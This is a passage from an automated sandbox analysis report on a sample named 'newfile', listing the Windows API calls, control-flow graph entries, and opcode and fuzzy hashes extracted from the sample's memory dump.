                                                                            • memcpy.MSVCRT ref: 005F2AEB
                                                                            • GetProcessHeap.KERNEL32(00000000,?,?,005F2BA4,?,?,8000FFFF,00000000,?,?,?,005F286D,?,?), ref: 005F2B37
                                                                            • HeapFree.KERNEL32(00000000,?,005F2BA4,?,?,8000FFFF,00000000,?,?,?,005F286D,?,?), ref: 005F2B3E
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000016.00000002.1972097534.00000000005F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005F0000, based on PE: true
                                                                            • Associated: 00000016.00000002.1972008473.00000000005F0000.00000002.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000016.00000002.1972136151.00000000005F5000.00000002.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000016.00000002.1972136151.00000000005F7000.00000002.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000016.00000002.1972136151.000000000060D000.00000002.00000001.01000000.00000008.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_22_2_5f0000_newfile.jbxd
                                                                            Similarity
                                                                            • API ID: Heap$Process$AllocFreememcpy
                                                                            • String ID: m(_
                                                                            • API String ID: 3405790324-432497582
                                                                            • Opcode ID: e39ed1cae2803a0a7a3b1722d7d08859abaf62cbd86e68159530bc0733eb99cd
                                                                            • Instruction ID: 9290d9c82a35f51f1af01a1357cd2bf409bda92902b3ce65d816f041a04271c2
                                                                            • Opcode Fuzzy Hash: e39ed1cae2803a0a7a3b1722d7d08859abaf62cbd86e68159530bc0733eb99cd
                                                                            • Instruction Fuzzy Hash: 4F2135F1A0060AABDB265F6DD888B35BFA9BB00310F104129EF55CB294DBBCDC04CB90
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Control-flow Graph

                                                                            control_flow_graph 339 5f3675-5f3698 340 5f369e-5f36eb GetSystemTimeAsFileTime GetCurrentProcessId GetCurrentThreadId GetTickCount QueryPerformanceCounter 339->340 341 5f369a-5f369c 339->341 343 5f36ed-5f36f3 340->343 344 5f36f5-5f36fa 340->344 341->340 342 5f3702-5f370c 341->342 343->344 345 5f36fc 343->345 344->345 345->342
                                                                            APIs
                                                                            • GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 005F36A2
                                                                            • GetCurrentProcessId.KERNEL32 ref: 005F36B1
                                                                            • GetCurrentThreadId.KERNEL32 ref: 005F36BA
                                                                            • GetTickCount.KERNEL32 ref: 005F36C3
                                                                            • QueryPerformanceCounter.KERNEL32(?), ref: 005F36D8
                                                                            Memory Dump Source
                                                                            • Source File: 00000016.00000002.1972097534.00000000005F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005F0000, based on PE: true
                                                                            • Associated: 00000016.00000002.1972008473.00000000005F0000.00000002.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000016.00000002.1972136151.00000000005F5000.00000002.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000016.00000002.1972136151.00000000005F7000.00000002.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000016.00000002.1972136151.000000000060D000.00000002.00000001.01000000.00000008.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_22_2_5f0000_newfile.jbxd
                                                                            Similarity
                                                                            • API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
                                                                            • String ID:
                                                                            • API String ID: 1445889803-0
                                                                            • Opcode ID: fcb5f78ef979eb74de56dccf1c8f0e11904f5d1abac2e777d5c146ede76a9cdb
                                                                            • Instruction ID: 33870cb7164832163fb9ea996ae2fa38138274a4ce41d96a3f723c6c3516163a
                                                                            • Opcode Fuzzy Hash: fcb5f78ef979eb74de56dccf1c8f0e11904f5d1abac2e777d5c146ede76a9cdb
                                                                            • Instruction Fuzzy Hash: 1D11FB71D01508EBDB10DBB8E94C6AEBBF8FF58351F510855D601EB250EA389A04DB40
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Control-flow Graph

                                                                            APIs
                                                                            • SetUnhandledExceptionFilter.KERNEL32(00000000,?,005F33F6,`@_), ref: 005F32C7
                                                                            • UnhandledExceptionFilter.KERNEL32(005F33F6,?,005F33F6,`@_), ref: 005F32D0
                                                                            • GetCurrentProcess.KERNEL32(C0000409,?,005F33F6,`@_), ref: 005F32DB
                                                                            • TerminateProcess.KERNEL32(00000000,?,005F33F6,`@_), ref: 005F32E2
                                                                            Memory Dump Source
                                                                            • Source File: 00000016.00000002.1972097534.00000000005F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005F0000, based on PE: true
                                                                            • Associated: 00000016.00000002.1972008473.00000000005F0000.00000002.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000016.00000002.1972136151.00000000005F5000.00000002.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000016.00000002.1972136151.00000000005F7000.00000002.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000016.00000002.1972136151.000000000060D000.00000002.00000001.01000000.00000008.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_22_2_5f0000_newfile.jbxd
                                                                            Similarity
                                                                            • API ID: ExceptionFilterProcessUnhandled$CurrentTerminate
                                                                            • String ID:
                                                                            • API String ID: 3231755760-0
                                                                            • Opcode ID: 644c37bfe257f1594979400bf8628a1273b2437cd2ab19d5c9cb242f5fe66f28
                                                                            • Instruction ID: 57502252a1204bc290b372d949a6f47ce7b0d28600473535fb8a5d13f190f7a2
                                                                            • Opcode Fuzzy Hash: 644c37bfe257f1594979400bf8628a1273b2437cd2ab19d5c9cb242f5fe66f28
                                                                            • Instruction Fuzzy Hash: EDD09232000904ABDA002BA1AC0CE6A3F2DAB54312F054400B30DC6120AE398419EAA5
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • SetUnhandledExceptionFilter.KERNEL32(Function_00003400), ref: 005F3455
                                                                            Memory Dump Source
                                                                            • Source File: 00000016.00000002.1972097534.00000000005F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005F0000, based on PE: true
                                                                            • Associated: 00000016.00000002.1972008473.00000000005F0000.00000002.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000016.00000002.1972136151.00000000005F5000.00000002.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000016.00000002.1972136151.00000000005F7000.00000002.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000016.00000002.1972136151.000000000060D000.00000002.00000001.01000000.00000008.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_22_2_5f0000_newfile.jbxd
                                                                            Similarity
                                                                            • API ID: ExceptionFilterUnhandled
                                                                            • String ID:
                                                                            • API String ID: 3192549508-0
                                                                            • Opcode ID: bcecc7ced6daa1e7f48302856093cb3b4b5c84f15d4e3660bda6a9d153eaff29
                                                                            • Instruction ID: 2774a1572d65c6204e23b80497ca3e8b2c24631dde4b4cc195eeae4603cc494a
                                                                            • Opcode Fuzzy Hash: bcecc7ced6daa1e7f48302856093cb3b4b5c84f15d4e3660bda6a9d153eaff29
                                                                            • Instruction Fuzzy Hash: 649002A0355504465B0117705C1E5252E957A5870B7820490A205C615CEE588105A555
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000016.00000002.1972097534.00000000005F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005F0000, based on PE: true
                                                                            • Associated: 00000016.00000002.1972008473.00000000005F0000.00000002.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000016.00000002.1972136151.00000000005F5000.00000002.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000016.00000002.1972136151.00000000005F7000.00000002.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000016.00000002.1972136151.000000000060D000.00000002.00000001.01000000.00000008.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_22_2_5f0000_newfile.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: 5_
                                                                            • API String ID: 0-3184794191
                                                                            • Opcode ID: a766d3b511325246591146fa678ec37a36ce2690c67ca02a39aa05bc8c5beb23
                                                                            • Instruction ID: 9e2c982cb0d3899d448cc8c223c02a11d3b7bcade16eb5d37225f3ba7be1f436
                                                                            • Opcode Fuzzy Hash: a766d3b511325246591146fa678ec37a36ce2690c67ca02a39aa05bc8c5beb23
                                                                            • Instruction Fuzzy Hash: B8F06C337051195F9B54CB4EDCC097EB7DAEFC47347198079E60987602DA78ED42C694
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Control-flow Graph

                                                                            APIs
                                                                              • Part of subcall function 005F34D8: GetModuleHandleW.KERNEL32(00000000), ref: 005F34DF
                                                                            • __set_app_type.MSVCRT ref: 005F2F92
                                                                            • __p__fmode.MSVCRT ref: 005F2FA8
                                                                            • __p__commode.MSVCRT ref: 005F2FB6
                                                                            • __setusermatherr.MSVCRT ref: 005F2FD7
                                                                            Memory Dump Source
                                                                            • Source File: 00000016.00000002.1972097534.00000000005F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005F0000, based on PE: true
                                                                            • Associated: 00000016.00000002.1972008473.00000000005F0000.00000002.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000016.00000002.1972136151.00000000005F5000.00000002.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000016.00000002.1972136151.00000000005F7000.00000002.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000016.00000002.1972136151.000000000060D000.00000002.00000001.01000000.00000008.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_22_2_5f0000_newfile.jbxd
                                                                            Similarity
                                                                            • API ID: HandleModule__p__commode__p__fmode__set_app_type__setusermatherr
                                                                            • String ID:
                                                                            • API String ID: 1632413811-0
                                                                            • Opcode ID: d0a9b206912e7266b2b1870b88f2ac5ed5a50505b05396c26ab86e9b7db6273d
                                                                            • Instruction ID: 4d866c703b00546947f4fd547d460bea404adee45b0d077c9672449bcb9c57b2
                                                                            • Opcode Fuzzy Hash: d0a9b206912e7266b2b1870b88f2ac5ed5a50505b05396c26ab86e9b7db6273d
                                                                            • Instruction Fuzzy Hash: D5F0F8B4544705CFD7186B30AC0E63A3FA4F764321B104A19E662C62E5EF3D8288EE10
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%